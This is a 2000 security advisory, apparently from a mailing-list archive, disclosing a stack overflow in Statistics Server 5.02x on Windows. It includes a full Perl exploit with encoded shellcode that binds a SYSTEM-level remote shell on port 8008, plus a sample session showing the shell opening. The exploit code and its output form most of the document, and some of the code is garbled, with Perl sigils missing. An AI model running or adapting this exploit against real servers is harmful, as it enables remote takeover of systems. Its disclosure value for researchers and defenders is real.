OSEC

Neohapsis is currently accepting applications for employment. For more information, please visit our website www.neohapsis.com or email hr@neohapsis.com
 
Subject: [DeepZone Advisory] Statistics Server 5.02x stack overflow (Win2k remote exploit)
From: |Zan (izanDEEPZONE.ORG)
Date: Thu Aug 10 2000 - 15:02:16 CDT


-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

                                Statistics Server 5.02x overflow
                        
                 Advisory Name: Statistics Server Live Stats
             Advisory Released: [00/08/10]
                   Application: Web site traffic analyzer
                      Severity: local/remote user can run arbitrary
                                code with WebServer privileges
                        Status: vendor contacted
                       Authors: Nemo - nemodeepzone.org
                                |Zan - izandeepzone.org
                           WWW: http://www.deepzone.org
                                http://deepzone.cjb.net

        ___________________________________________________________________

        OVERVIEW

        'Statistics Server is far more than just another log analyzer. It
         analyzes Web site traffic in "Real-time" and generates "Live Stats"
         reports in an easy to use Web interface.'

        'The ability of Statistics Server to deliver Live Web statistics for
         high volume installations has made it an essential component of
         many corporate Internet and Intranet Web sites and ISP Web hosting
         installations.'

        ___________________________________________________________________

        BACKGROUND

        Statistics Server 5.02x ships with a stack overflow in its web
        component. It *lets run arbitrary code inside* by local/remote user.

        Tests, ideas & exploits were tested against Win2k/Spanish version
        and WinNT 4.0/sp6a Spanish version.

        Web server runs like a system service with a default installation.

        ___________________________________________________________________

        DETAILS

        Web server can't handle long requests correctly. When a long GET
        (about 2033 bytes) request is made. It dies with EIP overwritten.

        It lets run arbitrary code with web servers privileges (system
        privileges by default).

        ___________________________________________________________________

        EXPLOIT

        It spawns a remote winshell on 8008 port. It doesn't kill webserver
        so webserver continues running while hack is made. When hack is
        finished webserver will run perfectly too.

        ex.

        $ lynx http://vulnerable.com

                Server Selection
                Please Enter Server ID _____________ GO

                ....

        $ ./ssexploit502x.pl vulnerable.com 80

                (c) Deep Zone - Statistics Server 5.02x's exploit

                        Coded by |Zan - izandeepzone.org

             -=[ http://www.deepzone.org - http://deepzone.cjb.net ]=-

          spawning remote shell on port 8008 ...

        HTTP/1.0 302
        Server: Statistics Server 5.0
        Location: /_XXXXXXXXX_http://XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
        XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
        XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX

                 ... ... ... ... ... ... ...

        Content-Type: text/html
        Connection: Keep-Alive
        Content-Lenght: 0

        ... done.

        $ lynx http://vulnerable.com (It continues working }:)

                Server Selection
                Please Enter Server ID _____________ GO

                ....

        $ telnet vulnerable.com 8008

         Trying vulnerable.com...
         Connected to vulnerable.com.
         Escape character is '^]'.

         Microsoft Windows 2000 [Version 5.00.2195]
         (C) Copyright 1985-1999 Microsoft Corp.

         D:\StatisticsServer>

        ___________________________________________________________________

        FIXES/PATCHES

        We contacted Statistics Server support in http://www.mediahouse.com
        six weeks ago.

        Firstly they told us that new release didn't contain any bof bug.
        When we sent a DoS source they told us that new release could have
        some problem and it will be fixed in next new release, while we will
        be kept to update with fix progress.

        We weren't contacted again. Any news about mediahouse.com

        Two days ago we email them again asking them about patchs, fixes
        and progress. We haven't any reply.

        ___________________________________________________________________

        
        EXPLOIT SOURCE

        bug was discovered by Nemo - nemodeepzone.org while auditing a
        very important spanish ISP (others affected).

        bug was exploited by |Zan - izandeepzone.org

        exploit works against Win2k/Statistics Server 5.02x running like
        service.

        
        #!/usr/bin/perl -w
        # Statistics Server 5.02x's exploit.
        # usage: ./ssexploit502x.pl hostname port
        # 00/08/10
        # http://www.deepzone.org
        # http://deepzone.cjb.net
        # http://mareasvivas.cjb.net (|Zan homepage)
        #
        # --|Zan <izandeepzone.org>
        # ----------------------------------------------------------------
        #
        # This exploit works against Statistics Server 5.02x/Win2k.
        #
        # Tested with Win2k (spanish version).
        #
        # It spawns a remote winshell on 8008 port. It doesn't kill
        # webserver so webserver continues running while hack is made.
        # When hack is finished webserver will run perfectly too.
        #
        # Default installation gives us a remote shell with system
        # privileges.
        #
        # overflow discovered by
        # -- Nemo <nemodeepzone.org>
        #
        # exploit coded by
        # -- |Zan <izandeepzone.org>
        #
        # ----------------------------------------------------------------

        use IO::Socket;

        crash = (
        "\x68","\x8b","\x41","\x1d","\x01","\x68","\x41","\x41","\x41",
        "\x41","\x68","\x61","\x41","\x41","\x41","\x58","\x59","\x5f",
        "\x2b","\xc1","\xaa","\x33","\xc9","\x66","\xb9","\x71","\x04",
        "\x90","\x90","\x90","\x68","\xbd","\x3e","\x1d","\x01","\x5e",
        "\x56","\x5f","\x33","\xd2","\x80","\xc2","\x99","\xac","\x32",
        "\xc2","\xaa","\xe2","\xfa","\x71","\x99","\x99","\x99","\x99",
        "\xc4","\x18","\x74","\xaf","\x89","\xd9","\x99","\x14","\x2c",
        "\xd4","\x8a","\xd9","\x99","\x14","\x24","\xcc","\x8a","\xd9",
        "\x99","\xf3","\x9e","\x09","\x09","\x09","\x09","\xc0","\x71",
        "\x4b","\x9b","\x99","\x99","\x14","\x2c","\x1c","\x8a","\xd9",
        "\x99","\x14","\x24","\x17","\x8a","\xd9","\x99","\xf3","\x93",
        "\x09","\x09","\x09","\x09","\xc0","\x71","\x23","\x9b","\x99",
        "\x99","\xf3","\x99","\x14","\x2c","\x8b","\x8d","\xd9","\x99",
        "\xcf","\x14","\x2c","\x87","\x8d","\xd9","\x99","\xcf","\x14",
        "\x2c","\xbb","\x8d","\xd9","\x99","\xcf","\x66","\x0c","\x17",
        "\x8a","\xd9","\x99","\xf3","\x99","\x14","\x2c","\x8b","\x8d",
        "\xd9","\x99","\xcf","\x14","\x2c","\xbf","\x8d","\xd9","\x99",
        "\xcf","\x14","\x2c","\xb3","\x8d","\xd9","\x99","\xcf","\x66",
        "\x0c","\x17","\x8a","\xd9","\x99","\x5e","\x1c","\xb7","\x8d",
        "\xd9","\x99","\xdd","\x99","\x99","\x99","\x14","\x2c","\xb7",
        "\x8d","\xd9","\x99","\xcf","\x66","\x0c","\x0b","\x8a","\xd9",
        "\x99","\x14","\x2c","\xff","\x8d","\xd9","\x99","\x34","\xc9",
        "\x66","\x0c","\x37","\x8a","\xd9","\x99","\x14","\x2c","\xf3",
        "\x8d","\xd9","\x99","\x34","\xc9","\x66","\x0c","\x37","\x8a",
        "\xd9","\x99","\x14","\x2c","\xb3","\x8d","\xd9","\x99","\x14",
        "\x24","\xff","\x8d","\xd9","\x99","\x3c","\x14","\x2c","\x87",
        "\x8d","\xd9","\x99","\x34","\x14","\x24","\xf3","\x8d","\xd9",
        "\x99","\x32","\x14","\x24","\xf7","\x8d","\xd9","\x99","\x32",
        "\x5e","\x1c","\xc7","\x8d","\xd9","\x99","\x99","\x99","\x99",
        "\x99","\x5e","\x1c","\xc3","\x8d","\xd9","\x99","\x98","\x98",
        "\x99","\x99","\x14","\x2c","\xeb","\x8d","\xd9","\x99","\xcf",
        "\x14","\x2c","\xb7","\x8d","\xd9","\x99","\xcf","\xf3","\x99",
        "\xf3","\x99","\xf3","\x89","\xf3","\x98","\xf3","\x99","\xf3",
        "\x99","\x14","\x2c","\x1b","\x8d","\xd9","\x99","\xcf","\xf3",
        "\x99","\x66","\x0c","\x0f","\x8a","\xd9","\x99","\xf1","\x99",
        "\xb9","\x99","\x99","\x09","\xf1","\x99","\x9b","\x99","\x99",
        "\x66","\x0c","\x07","\x8a","\xd9","\x99","\x10","\x1c","\x13",
        "\x8d","\xd9","\x99","\xaa","\x59","\xc9","\xd9","\xc9","\xd9",
        "\xc9","\x66","\x0c","\xcc","\x8a","\xd9","\x99","\xc9","\xc2",
        "\xf3","\x89","\x14","\x2c","\x9b","\x8d","\xd9","\x99","\xcf",
        "\xca","\x66","\x0c","\xc0","\x8a","\xd9","\x99","\xf3","\x9a",
        "\xca","\x66","\x0c","\xc4","\x8a","\xd9","\x99","\x14","\x2c",
        "\x17","\x8d","\xd9","\x99","\xcf","\x14","\x2c","\x9b","\x8d",
        "\xd9","\x99","\xcf","\xca","\x66","\x0c","\xf8","\x8a","\xd9",
        "\x99","\x14","\x24","\x0b","\x8d","\xd9","\x99","\x32","\xaa",
        "\x59","\xc9","\x14","\x24","\x07","\x8d","\xd9","\x99","\xce",
        "\xc9","\xc9","\xc9","\x14","\x2c","\xbb","\x8d","\xd9","\x99",
        "\x34","\xc9","\x66","\x0c","\x03","\x8a","\xd9","\x99","\xf3",
        "\xa9","\x66","\x0c","\x33","\x8a","\xd9","\x99","\x72","\xd4",
        "\x09","\x09","\x09","\xaa","\x59","\xc9","\x14","\x24","\x07",
        "\x8d","\xd9","\x99","\xce","\xc9","\xc9","\xc9","\x14","\x2c",
        "\xbb","\x8d","\xd9","\x99","\x34","\xc9","\x66","\x0c","\x03",
        "\x8a","\xd9","\x99","\xf3","\xa9","\x66","\x0c","\x33","\x8a",
        "\xd9","\x99","\x1a","\x24","\x07","\x8d","\xd9","\x99","\x9b",
        "\x96","\x1b","\x8e","\x98","\x99","\x99","\x18","\x24","\x07",
        "\x8d","\xd9","\x99","\x98","\xb9","\x99","\x99","\xeb","\x97",
        "\x09","\x09","\x09","\x09","\x5e","\x1c","\x07","\x8d","\xd9",
        "\x99","\x99","\xb9","\x99","\x99","\xf3","\x99","\x12","\x1c",
        "\x07","\x8d","\xd9","\x99","\x14","\x24","\x07","\x8d","\xd9",
        "\x99","\xce","\xc9","\x12","\x1c","\x13","\x8d","\xd9","\x99",
        "\xc9","\x14","\x2c","\xbb","\x8d","\xd9","\x99","\x34","\xc9",
        "\x66","\x0c","\x3b","\x8a","\xd9","\x99","\xf3","\xa9","\x66",
        "\x0c","\x33","\x8a","\xd9","\x99","\x12","\x1c","\x07","\x8d",
        "\xd9","\x99","\xf3","\x99","\xc9","\x14","\x2c","\x13","\x8d",
        "\xd9","\x99","\x34","\xc9","\x14","\x2c","\x0b","\x8d","\xd9",
        "\x99","\x34","\xc9","\x66","\x0c","\xfc","\x8a","\xd9","\x99",
        "\xf3","\x99","\x14","\x24","\x07","\x8d","\xd9","\x99","\xce",
        "\xf3","\x99","\xf3","\x99","\xf3","\x99","\x14","\x2c","\xbb",
        "\x8d","\xd9","\x99","\x34","\xc9","\x66","\x0c","\x03","\x8a",
        "\xd9","\x99","\xf3","\xa9","\x66","\x0c","\x33","\x8a","\xd9",
        "\x99","\xaa","\x50","\xa0","\x14","\x07","\x8d","\xd9","\x99",
        "\x96","\x1e","\xfe","\x66","\x66","\x66","\xf3","\x99","\xf1",
        "\x99","\xb9","\x99","\x99","\x09","\x14","\x2c","\x13","\x8d",
        "\xd9","\x99","\x34","\xc9","\x14","\x2c","\x0b","\x8d","\xd9",
        "\x99","\x34","\xc9","\x66","\x0c","\xf0","\x8a","\xd9","\x99",
        "\x10","\x1c","\x03","\x8d","\xd9","\x99","\xf3","\x99","\x14",
        "\x24","\x07","\x8d","\xd9","\x99","\xce","\xc9","\x14","\x2c",
        "\x13","\x8d","\xd9","\x99","\x34","\xc9","\x14","\x2c","\xbf",
        "\x8d","\xd9","\x99","\x34","\xc9","\x66","\x0c","\x3f","\x8a",
        "\xd9","\x99","\xf3","\xa9","\x66","\x0c","\x33","\x8a","\xd9",
        "\x99","\xf3","\x99","\x12","\x1c","\x03","\x8d","\xd9","\x99",
        "\x14","\x24","\x07","\x8d","\xd9","\x99","\xce","\xc9","\x12",
        "\x1c","\x13","\x8d","\xd9","\x99","\xc9","\x14","\x2c","\xbb",
        "\x8d","\xd9","\x99","\x34","\xc9","\x66","\x0c","\x3b","\x8a",
        "\xd9","\x99","\xf3","\xa9","\x66","\x0c","\x33","\x8a","\xd9",
        "\x99","\x70","\x90","\x67","\x66","\x66","\x14","\x2c","\x0b",
        "\x8d","\xd9","\x99","\x34","\xc9","\x66","\x0c","\xf4","\x8a",
        "\xd9","\x99","\x14","\x2c","\x0f","\x8d","\xd9","\x99","\x34",
        "\xc9","\x66","\x0c","\xf4","\x8a","\xd9","\x99","\xf3","\x99",
        "\x66","\x0c","\x2b","\x8a","\xd9","\x99","\xc8","\xcf","\xf1",
        "\x6d","\x39","\xdc","\x99","\xc3","\x66","\x8b","\xc9","\xc2",
        "\xc0","\xce","\xc7","\xc8","\xcf","\xca","\xf1","\xe5","\x38",
        "\xdc","\x99","\xc3","\x66","\x8b","\xc9","\x35","\x1d","\x59",
        "\xec","\x62","\xc1","\x32","\xc0","\x7b","\x73","\x5a","\xce",
        "\xca","\xd6","\xda","\xd2","\xaa","\xab","\x99","\xea","\xf6",
        "\xfa","\xf2","\xfc","\xed","\x99","\xfb","\xf0","\xf7","\xfd",
        "\x99","\xf5","\xf0","\xea","\xed","\xfc","\xf7","\x99","\xf8",
        "\xfa","\xfa","\xfc","\xe9","\xed","\x99","\xea","\xfc","\xf7",
        "\xfd","\x99","\xeb","\xfc","\xfa","\xef","\x99","\xfa","\xf5",
        "\xf6","\xea","\xfc","\xea","\xf6","\xfa","\xf2","\xfc","\xed",
        "\x99","\xd2","\xdc","\xcb","\xd7","\xdc","\xd5","\xaa","\xab",
        "\x99","\xda","\xeb","\xfc","\xf8","\xed","\xfc","\xc9","\xf0",
        "\xe9","\xfc","\x99","\xde","\xfc","\xed","\xca","\xed","\xf8",
        "\xeb","\xed","\xec","\xe9","\xd0","\xf7","\xff","\xf6","\xd8",
        "\x99","\xda","\xeb","\xfc","\xf8","\xed","\xfc","\xc9","\xeb",
        "\xf6","\xfa","\xfc","\xea","\xea","\xd8","\x99","\xc9","\xfc",
        "\xfc","\xf2","\xd7","\xf8","\xf4","\xfc","\xfd","\xc9","\xf0",
        "\xe9","\xfc","\x99","\xde","\xf5","\xf6","\xfb","\xf8","\xf5",
        "\xd8","\xf5","\xf5","\xf6","\xfa","\x99","\xcb","\xfc","\xf8",
        "\xfd","\xdf","\xf0","\xf5","\xfc","\x99","\xce","\xeb","\xf0",
        "\xed","\xfc","\xdf","\xf0","\xf5","\xfc","\x99","\xca","\xf5",
        "\xfc","\xfc","\xe9","\x99","\xda","\xf5","\xf6","\xea","\xfc",
        "\xd1","\xf8","\xf7","\xfd","\xf5","\xfc","\x99","\xdc","\xe1",
        "\xf0","\xed","\xcd","\xf1","\xeb","\xfc","\xf8","\xfd","\x99",
        "\x9b","\x99","\x86","\xd1","\x99","\x99","\x99","\x99","\x99",
        "\x99","\x99","\x99","\x99","\x99","\x99","\x99","\x95","\x99",
        "\x99","\x99","\x99","\x99","\x99","\x99","\x98","\x99","\x99",
        "\x99","\x99","\x99","\x99","\x99","\x99","\x99","\x99","\x99",
        "\x99","\x99","\x99","\x99","\x99","\x99","\x99","\x99","\x99",
        "\x99","\x99","\x99","\x99","\x99","\x99","\x99","\x99","\x99",
        "\x99","\x99","\x99","\x99","\x99","\x99","\x99","\x99","\x99",
        "\x99","\x99","\x99","\x99","\x99","\x99","\x99","\x99","\x99",
        "\x99","\x99","\x99","\x99","\x99","\x99","\x99","\x99","\x99",
        "\x99","\x99","\x99","\x99","\x99","\x99","\x99","\x99","\x99",
        "\x99","\x99","\x99","\x99","\x99","\x99","\x99","\x99","\x99",
        "\x99","\x99","\x99","\x99","\x99","\x99","\x99","\x99","\x99",
        "\x99","\x99","\x99","\x99","\x99","\x99","\x99","\x99","\x99",
        "\x99","\x99","\x99","\x99","\x99","\x99","\x99","\x99","\x99",
        "\x99","\x99","\xda","\xd4","\xdd","\xb7","\xdc","\xc1","\xdc",
        "\x99","\x99","\x99","\x99","\x99","\x89","\x99","\x99","\x99",
        "\x99","\x99","\x99","\x99","\x99","\x99","\x99","\x99","\x99",
        "\x99","\x99","\x99","\x99","\x99","\x99","\x99","\x90","\x90");

        # ----------------------------------------------------------------

        sub pcommands
        {
                die "usage: $0 hostname port\n" if (ARGV != 2);
                ($host) = shift ARGV;
                ($port) = shift ARGV;
        }

        sub show_credits
        {
        print "\n\n\t (c) 2000 Deep Zone - Statistics Server
5.02x's";
        print "exploit\n\n\t\t Coded by |Zan -
izan\deepzone.org\n";
        print "\n\t-=[ http://www.deepzone.org -
http://deepzone.cjb";
        print ".net ]=-\n\n";
        }

        sub bofit
        {

                print "\nspawning remote shell on port 8008 ...\n\n";

                $s = IO::Socket::INET->new(PeerAddr=>$host,
                                           PeerPort=>$port,
                                           Proto=>"tcp");

                if(!$s) { die "error.\n"; }

                print $s "GET http://O";

                foreach $item (crash) {
                        print $s $item
                      }

                for ($cont=0; $cont<840;$cont++) {
                        print $s "\x90"
                      }

                print $s "\x8c\x3e\x1d\x01";

                print $s "\r\n\r\n";

                while (<$s>) { print }

                print "... done.\n\n";

        }

        # ----- begin

        show_credits;
        pcommands;
        bofit;

        # ----- that's all :)

        ___________________________________________________________________

        GREETINGS

        Attrition, beavuh, ADM, Technotronic, b0f .... and of course ....

        RFP and Wiretrip
        

        -- ] EOF

- --
|Zan / DeepZone (tm) - Digital Security Center
http://www.deepzone.org - http://mareasvivas.cjb.net

PGP key fingerprint:
AD 97 A6 AB DC BB D2 CF 89 AE 0A 88 7E 5D 9D 97 BB F6 B0 B8

- --=[ ... toda la vida buscando respuestas ... y cuando por fin
               las encuentras ... cambian las preguntas ]=--

-----BEGIN PGP SIGNATURE-----
Version: PGPfreeware 6.5.3 for non-commercial use <http://www.pgp.com>

iQA/AwUBOZL7j35dnZe79rC4EQKNBgCg50QJs6JqKM0gOjBJ+KfaQ7lWAnwAnAkI
IS4fs41nCvWP7tULf0KwU0m8
=Gnrm
-----END PGP SIGNATURE-----